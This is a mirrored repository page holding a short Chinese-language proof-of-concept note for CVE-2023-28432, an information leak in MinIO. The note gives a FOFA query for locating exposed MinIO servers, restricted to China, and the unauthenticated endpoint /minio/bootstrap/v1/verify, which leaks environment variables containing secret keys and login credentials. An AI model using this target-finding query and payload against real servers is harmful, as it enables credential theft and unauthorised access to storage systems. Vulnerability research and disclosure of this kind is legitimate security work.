admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Minio/Minio-verify信息泄露(CVE-2023-28432).md

17 lines
603 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## Minio-verify信息泄露(CVE-2023-28432)
MinIO中存在一处信息泄露漏洞由于Minio集群进行信息交换的9000端口在未经配置的情况下通过发送特殊HPPT请求进行未授权访问进而导致MinIO对象存储的相关环境变量泄露环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
## fofa
```
(banner="MinIO" || header="MinIO" || title="MinIO Browser") && country="CN"
```
## poc
```
/minio/bootstrap/v1/verify
```
![image-20240604123832575](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406041238644.png)
Reference in New Issue Copy Permalink